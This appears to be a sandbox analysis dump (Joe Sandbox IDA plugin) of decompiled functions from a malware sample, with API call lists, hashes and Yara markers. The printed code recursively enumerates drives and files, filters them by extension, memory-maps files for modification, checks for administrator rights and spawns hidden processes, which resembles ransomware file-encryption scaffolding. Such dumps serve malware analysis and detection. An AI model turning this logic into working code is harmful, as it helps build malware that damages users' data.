                                    • Instruction Fuzzy Hash: D0514370908301DFC310DF18C984B5BBBE1FF88324F504A2EE989AB391D375A949CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F586F40(void* _a4) {
                                    				intOrPtr _v0;
                                    				intOrPtr _v4;
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				struct _CRITICAL_SECTION _v40;
                                    				WCHAR* _t12;
                                    				void* _t22;
                                    
                                    				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                    				_t22 = _a4;
                                    				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                    				InitializeCriticalSection( &_v40);
                                    				_v12 = 0x2710;
                                    				_v8 = 0;
                                    				_v4 = 0xffffffff;
                                    				_v0 = 0xffffffff;
                                    				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                    				E0F586DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                    				VirtualFree(_t22, 0, 0x8000);
                                    				ExitThread(0);
                                    			}











                                    0x0f586f59
                                    0x0f586f5f
                                    0x0f586f6e
                                    0x0f586f7c
                                    0x0f586f90
                                    0x0f586f98
                                    0x0f586fa0
                                    0x0f586fa8
                                    0x0f586fb6
                                    0x0f586fcb
                                    0x0f586fdb
                                    0x0f586fe3

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F586F59
                                    • wsprintfW.USER32 ref: 0F586F6E
                                    • InitializeCriticalSection.KERNEL32(?), ref: 0F586F7C
                                    • VirtualAlloc.KERNEL32 ref: 0F586FB0
                                      • Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                      • Part of subcall function 0F586DF0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
                                      • Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F586FDB
                                    • ExitThread.KERNEL32 ref: 0F586FE3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                    • String ID: %c:\
                                    • API String ID: 1988002015-3142399695
                                    • Opcode ID: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
                                    • Instruction ID: 291b2525e64ddbce8bf315f89cba2bc34e9f46a70543ada91606c02c37840372
                                    • Opcode Fuzzy Hash: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
                                    • Instruction Fuzzy Hash: BB01D6B0144300BBE7109F20CD8AF173FA8AB44B21F004615FB65AA2C1D7B8951ACB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E0F582890(WCHAR* __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t14;
                                    				void* _t18;
                                    				void* _t23;
                                    				WCHAR* _t29;
                                    				void* _t34;
                                    				signed int _t35;
                                    				long _t37;
                                    				void* _t38;
                                    				void* _t40;
                                    
                                    				_t29 = __ecx;
                                    				_t28 = 0;
                                    				_v12 = __edx;
                                    				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                    				if(_t34 == 0xffffffff) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					_v8 = GetFileSize(_t34, 0);
                                    					E0F583030(0, _t34, _t35);
                                    					asm("sbb esi, esi");
                                    					_t37 = (_t35 & 0x00000003) + 1;
                                    					_t14 = E0F583030(0, _t34, _t37);
                                    					asm("sbb eax, eax");
                                    					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                    					_v16 = _t18;
                                    					if(_t18 != 0) {
                                    						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                    						if(_t38 != 0) {
                                    							_t23 = E0F583030(0, _t34, _t38);
                                    							if(_t23 == 0) {
                                    								_push(_t29);
                                    								_t4 = _t38 + 0x53; // 0x53
                                    								_t29 = _t4;
                                    								_t5 = _t23 + 6; // 0x6
                                    								E0F588400(_t29, _t5);
                                    								_t40 = _t40 + 4;
                                    							}
                                    							_push(_t29);
                                    							_t28 = E0F582830(_v12, _t38, _v8);
                                    							UnmapViewOfFile(_t38);
                                    						}
                                    						CloseHandle(_v16);
                                    						CloseHandle(_t34);
                                    						return _t28;
                                    					} else {
                                    						CloseHandle(_t34);
                                    						goto L3;
                                    					}
                                    				}
                                    			}


















                                    0x0f582890
                                    0x0f582899
                                    0x0f58289b
                                    0x0f5828b1
                                    0x0f5828b6
                                    0x0f5828f9
                                    0x0f582901
                                    0x0f5828b8
                                    0x0f5828c0
                                    0x0f5828c3
                                    0x0f5828ca
                                    0x0f5828cf
                                    0x0f5828d0
                                    0x0f5828d8
                                    0x0f5828e5
                                    0x0f5828eb
                                    0x0f5828f0
                                    0x0f582910
                                    0x0f582914
                                    0x0f582916
                                    0x0f58291d
                                    0x0f58291f
                                    0x0f582920
                                    0x0f582920
                                    0x0f582923
                                    0x0f582926
                                    0x0f58292b
                                    0x0f58292b
                                    0x0f58292e
                                    0x0f58293f
                                    0x0f582942
                                    0x0f582942
                                    0x0f582951
                                    0x0f582954
                                    0x0f58295e
                                    0x0f5828f2
                                    0x0f5828f3
                                    0x00000000
                                    0x0f5828f3
                                    0x0f5828f0

                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F582C02), ref: 0F5828AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,0F582C02), ref: 0F5828BA
                                    • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F582C02), ref: 0F5828E5
                                    • CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F5828F3
                                    • MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F582C02), ref: 0F58290A
                                    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F582C02), ref: 0F582942
                                    • CloseHandle.KERNEL32(?,?,?,0F582C02), ref: 0F582951
                                    • CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F582954
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                    • String ID:
                                    • API String ID: 265113797-0
                                    • Opcode ID: 3ec919bdeac7e958364e995515fdd8c50c0068969fdf56239e857dcf4ed49e6e
                                    • Instruction ID: ec4abebaa35db9d10f304be953c7a5cccd1725b7aec16680b4e70216dac03bd5
                                    • Opcode Fuzzy Hash: 3ec919bdeac7e958364e995515fdd8c50c0068969fdf56239e857dcf4ed49e6e
                                    • Instruction Fuzzy Hash: 742104B1A002197FE7107BB49C85F7E7F6CEB85666F100236FD05B2281E7389C1759A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5869B0(WCHAR* __ecx) {
                                    				intOrPtr _v8;
                                    				signed int _t11;
                                    				void* _t20;
                                    				void* _t23;
                                    				signed int _t26;
                                    				signed int _t27;
                                    				intOrPtr _t28;
                                    				void* _t31;
                                    				signed short* _t35;
                                    				WCHAR* _t38;
                                    				WCHAR* _t40;
                                    				void* _t44;
                                    
                                    				_push(__ecx);
                                    				_t38 = __ecx;
                                    				if( *0xf592a60 != 0) {
                                    					_t11 = lstrlenW(__ecx);
                                    					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                    					if(_t11 == 0) {
                                    						L7:
                                    						return 1;
                                    					} else {
                                    						while( *_t40 != 0x2e) {
                                    							_t40 = _t40 - 2;
                                    							_t11 = _t11 - 1;
                                    							if(_t11 != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						if(_t11 != 0) {
                                    							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                    							wsprintfW(_t23, L"%s ", _t40);
                                    							_t35 =  *0xf592a60; // 0x0
                                    							_t28 = 0;
                                    							_v8 = 0;
                                    							if( *_t23 == 0) {
                                    								L20:
                                    								_t29 =  !=  ? 1 : _t28;
                                    								_v8 =  !=  ? 1 : _t28;
                                    							} else {
                                    								_t26 =  *_t35 & 0x0000ffff;
                                    								if(_t26 != 0) {
                                    									_t44 = _t35 - _t23;
                                    									do {
                                    										_t20 = _t23;
                                    										if(_t26 == 0) {
                                    											L16:
                                    											if( *_t20 == 0) {
                                    												goto L19;
                                    											} else {
                                    												goto L17;
                                    											}
                                    										} else {
                                    											while(1) {
                                    												_t27 =  *_t20 & 0x0000ffff;
                                    												if(_t27 == 0) {
                                    													break;
                                    												}
                                    												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                    												if(_t31 != 0) {
                                    													goto L16;
                                    												} else {
                                    													_t20 = _t20 + 2;
                                    													if( *(_t44 + _t20) != _t31) {
                                    														continue;
                                    													} else {
                                    														goto L16;
                                    													}
                                    												}
                                    												goto L21;
                                    											}
                                    											L19:
                                    											_t28 = 0;
                                    											goto L20;
                                    										}
                                    										goto L21;
                                    										L17:
                                    										_t26 = _t35[1] & 0x0000ffff;
                                    										_t35 =  &(_t35[1]);
                                    										_t44 = _t44 + 2;
                                    									} while (_t26 != 0);
                                    								}
                                    							}
                                    							L21:
                                    							VirtualFree(_t23, 0, 0x8000);
                                    							return _v8;
                                    						} else {
                                    							goto L7;
                                    						}
                                    					}
                                    				} else {
                                    					return 1;
                                    				}
                                    			}















                                    0x0f5869b3
                                    0x0f5869bc
                                    0x0f5869be
                                    0x0f5869d2
                                    0x0f5869d7
                                    0x0f5869dc
                                    0x0f5869f0
                                    0x0f5869fa
                                    0x0f5869e0
                                    0x0f5869e0
                                    0x0f5869e6
                                    0x0f5869e9
                                    0x0f5869ea
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5869ea
                                    0x0f5869ee
                                    0x0f586a17
                                    0x0f586a1f
                                    0x0f586a25
                                    0x0f586a2b
                                    0x0f586a30
                                    0x0f586a36
                                    0x0f586a82
                                    0x0f586a89
                                    0x0f586a8c
                                    0x0f586a38
                                    0x0f586a38
                                    0x0f586a3e
                                    0x0f586a42
                                    0x0f586a44
                                    0x0f586a44
                                    0x0f586a49
                                    0x0f586a69
                                    0x0f586a6d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586a4b
                                    0x0f586a50
                                    0x0f586a50
                                    0x0f586a56
                                    0x00000000
                                    0x00000000
                                    0x0f586a5c
                                    0x0f586a5e
                                    0x00000000
                                    0x0f586a60
                                    0x0f586a60
                                    0x0f586a67
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586a67
                                    0x00000000
                                    0x0f586a5e
                                    0x0f586a80
                                    0x0f586a80
                                    0x00000000
                                    0x0f586a80
                                    0x00000000
                                    0x0f586a6f
                                    0x0f586a6f
                                    0x0f586a73
                                    0x0f586a76
                                    0x0f586a79
                                    0x0f586a7e
                                    0x0f586a3e
                                    0x0f586a8f
                                    0x0f586a97
                                    0x0f586aa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5869ee
                                    0x0f5869c0
                                    0x0f5869c9
                                    0x0f5869c9

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: %s
                                    • API String ID: 1659193697-4273690596
                                    • Opcode ID: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
                                    • Instruction ID: 9442ac9452c9bb0c8e542145a2bc15fea8f6e6d51cd991a26dfaee94589e9f39
                                    • Opcode Fuzzy Hash: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
                                    • Instruction Fuzzy Hash: 9621F632A01225D7D7306B5C9D413B673A8FB85721F458276EC46BB281E7B5AD53C2D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F584E10(WCHAR* __ecx) {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOW _v92;
                                    				intOrPtr _t15;
                                    				intOrPtr _t16;
                                    				WCHAR* _t25;
                                    
                                    				asm("xorps xmm0, xmm0");
                                    				_t25 = __ecx;
                                    				asm("movdqu [ebp-0x10], xmm0");
                                    				E0F589170( &_v92, 0, 0x44);
                                    				_t15 =  *0xf592a6c; // 0x0
                                    				_v92.hStdError = _t15;
                                    				_v92.hStdOutput = _t15;
                                    				_t16 =  *0xf592a68; // 0x0
                                    				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                    				_v92.hStdInput = _t16;
                                    				_v92.wShowWindow = 0;
                                    				_v92.cb = 0x44;
                                    				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                    					CloseHandle(_v20);
                                    					return CloseHandle(_v20.hThread);
                                    				} else {
                                    					return GetLastError();
                                    				}
                                    			}








                                    0x0f584e1c
                                    0x0f584e22
                                    0x0f584e24
                                    0x0f584e29
                                    0x0f584e2e
                                    0x0f584e36
                                    0x0f584e39
                                    0x0f584e3c
                                    0x0f584e41
                                    0x0f584e48
                                    0x0f584e4d
                                    0x0f584e58
                                    0x0f584e77
                                    0x0f584e8d
                                    0x0f584e98
                                    0x0f584e79
                                    0x0f584e83
                                    0x0f584e83

                                    APIs
                                    • _memset.LIBCMT ref: 0F584E29
                                    • CreateProcessW.KERNEL32 ref: 0F584E6F
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 0F584E79
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E8D
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastProcess_memset
                                    • String ID: D
                                    • API String ID: 1393943095-2746444292
                                    • Opcode ID: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
                                    • Instruction ID: 6ca3ca8a7fcf8c385af7b3d77c7f72793dacd1f07f62118ef84623aeab92ddc8
                                    • Opcode Fuzzy Hash: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
                                    • Instruction Fuzzy Hash: 08018471E40319ABDB20DFA4DC46BDE7FB8EF04725F104126FA08FA280E7B525548B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0F583C70() {
                                    				signed int _v8;
                                    				void* _v12;
                                    				short _v16;
                                    				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                    				int _t13;
                                    				_Unknown_base(*)()* _t15;
                                    				signed int _t16;
                                    
                                    				_v20.Value = 0;
                                    				_v16 = 0x500;
                                    				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                    				if(_t13 != 0) {
                                    					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                    					_t16 =  *_t15(0, _v12,  &_v8);
                                    					asm("sbb eax, eax");
                                    					_v8 = _v8 &  ~_t16;
                                    					FreeSid(_v12);
                                    					return _v8;
                                    				} else {
                                    					return _t13;
                                    				}
                                    			}










                                    0x0f583c79
                                    0x0f583c99
                                    0x0f583ca0
                                    0x0f583ca8
                                    0x0f583cbf
                                    0x0f583cce
                                    0x0f583cd5
                                    0x0f583cd7
                                    0x0f583cda
                                    0x0f583ce6
                                    0x0f583cad
                                    0x0f583cad
                                    0x0f583cad

                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F583CB3
                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F583CBF
                                    • FreeSid.ADVAPI32(?), ref: 0F583CDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                    • String ID: CheckTokenMembership$advapi32.dll
                                    • API String ID: 3309497720-1888249752
                                    • Opcode ID: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
                                    • Instruction ID: 2b1507b6ebf2d3368effc32d115b70a33524dd9144a2034125ae55ac8099ac37
                                    • Opcode Fuzzy Hash: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
                                    • Instruction Fuzzy Hash: 5AF03C30A50209BBDB009BF4DD0AFAD7BB8FB04716F100595F900B6281E778662A9B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0F586E69() {
                                    				intOrPtr* _t34;
                                    				intOrPtr* _t38;
                                    				void* _t40;
                                    				WCHAR* _t46;
                                    				void* _t51;
                                    
                                    				do {
                                    					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                    						lstrcatW(_t46, _t51 - 0x238);
                                    						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                    							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                    							 *_t38 =  *_t38 + L0F586AB0( *_t38, _t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                    							asm("adc [ebx+0x4], edx");
                                    							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                    							if(__eflags <= 0) {
                                    								if(__eflags < 0) {
                                    									L8:
                                    									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                    									 *_t34 =  *_t34 + 1;
                                    									__eflags =  *_t34;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                    									if(__eflags < 0) {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							E0F586DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                    						}
                                    						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                    					}
                                    				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                    				FindClose( *(_t51 - 8));
                                    				return 0;
                                    			}








                                    0x0f586e70
                                    0x0f586e84
                                    0x0f586ea8
                                    0x0f586eb1
                                    0x0f586ee2
                                    0x0f586eed
                                    0x0f586eef
                                    0x0f586ef2
                                    0x0f586ef5
                                    0x0f586ef7
                                    0x0f586f00
                                    0x0f586f00
                                    0x0f586f03
                                    0x0f586f03
                                    0x0f586ef9
                                    0x0f586efc
                                    0x0f586efe
                                    0x00000000
                                    0x00000000
                                    0x0f586efe
                                    0x0f586ef7
                                    0x0f586eb3
                                    0x0f586ec7
                                    0x0f586ecc
                                    0x0f586f10
                                    0x0f586f10
                                    0x0f586f23
                                    0x0f586f2e
                                    0x0f586f3c

                                    APIs
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F586EA8
                                    • lstrcatW.KERNEL32(00000000,0F58FF7C), ref: 0F586EB9
                                      • Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                      • Part of subcall function 0F586DF0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
                                      • Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 2032009209-0
                                    • Opcode ID: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
                                    • Instruction ID: 1920c00e65b94681a648855e302fb06c2d088e33f59247a88c7751042cb7cf3a
                                    • Opcode Fuzzy Hash: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
                                    • Instruction Fuzzy Hash: 7E016D31A0024DAACB21BA60DC48BEE7BB8FF48240F0040A6F905F2111DB359A56DF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                    				char _t5;
                                    				char _t6;
                                    				intOrPtr _t8;
                                    				int _t10;
                                    				CHAR* _t13;
                                    				int _t15;
                                    				void* _t18;
                                    				CHAR* _t21;
                                    				CHAR* _t23;
                                    
                                    				_t23 = _a4;
                                    				_t18 = __ecx;
                                    				_t5 =  *_t23;
                                    				if(_t5 == 0) {
                                    					L4:
                                    					_t6 =  *_t23;
                                    					if(_t6 == 0x7d) {
                                    						goto L10;
                                    					} else {
                                    						_t21 = _t23;
                                    						if(_t6 != 0) {
                                    							while( *_t21 != 0x7d) {
                                    								_t21 =  &(_t21[1]);
                                    								if( *_t21 != 0) {
                                    									continue;
                                    								} else {
                                    								}
                                    								goto L12;
                                    							}
                                    							 *_t21 = 0;
                                    						}
                                    						L12:
                                    						_t8 = _a8;
                                    						if(_t8 != 1) {
                                    							if(_t8 == 2) {
                                    								_t10 = lstrlenA(_t23);
                                    								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                    								 *(_t18 + 8) = _t13;
                                    								goto L16;
                                    							}
                                    						} else {
                                    							_t15 = lstrlenA(_t23);
                                    							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                    							 *(_t18 + 4) = _t13;
                                    							L16:
                                    							if(_t13 != 0) {
                                    								lstrcpyA(_t13, _t23);
                                    							}
                                    						}
                                    						 *_t21 = 0x7d;
                                    						return 1;
                                    					}
                                    				} else {
                                    					while(_t5 != 0x7d) {
                                    						_t23 =  &(_t23[1]);
                                    						if(_t5 == 0x3d) {
                                    							goto L4;
                                    						} else {
                                    							_t5 =  *_t23;
                                    							if(_t5 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    						goto L19;
                                    					}
                                    					L10:
                                    					return 0;
                                    				}
                                    				L19:
                                    			}












                                    0x0f583205
                                    0x0f583208
                                    0x0f58320a
                                    0x0f58320e
                                    0x0f58321f
                                    0x0f58321f
                                    0x0f583223
                                    0x00000000
                                    0x0f583225
                                    0x0f583226
                                    0x0f58322a
                                    0x0f583230
                                    0x0f583235
                                    0x0f583239
                                    0x00000000
                                    0x00000000
                                    0x0f58323b
                                    0x00000000
                                    0x0f583239
                                    0x0f583245
                                    0x0f583245
                                    0x0f583248
                                    0x0f583248
                                    0x0f58324e
                                    0x0f583270
                                    0x0f583273
                                    0x0f583284
                                    0x0f58328a
                                    0x00000000
                                    0x0f58328a
                                    0x0f583250
                                    0x0f583251
                                    0x0f583262
                                    0x0f583268
                                    0x0f58328d
                                    0x0f58328f
                                    0x0f583293
                                    0x0f583293
                                    0x0f58328f
                                    0x0f583299
                                    0x0f5832a5
                                    0x0f5832a5
                                    0x0f583210
                                    0x0f583210
                                    0x0f583214
                                    0x0f583217
                                    0x00000000
                                    0x0f583219
                                    0x0f583219
                                    0x0f58321d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58321d
                                    0x00000000
                                    0x0f583217
                                    0x0f58323e
                                    0x0f583242
                                    0x0f583242
                                    0x00000000

                                    APIs
                                    • lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583251
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58325B
                                    • HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583262
                                    • lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583273
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58327D
                                    • HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583284
                                    • lstrcpyA.KERNEL32(00000000,0F585444,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583293
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
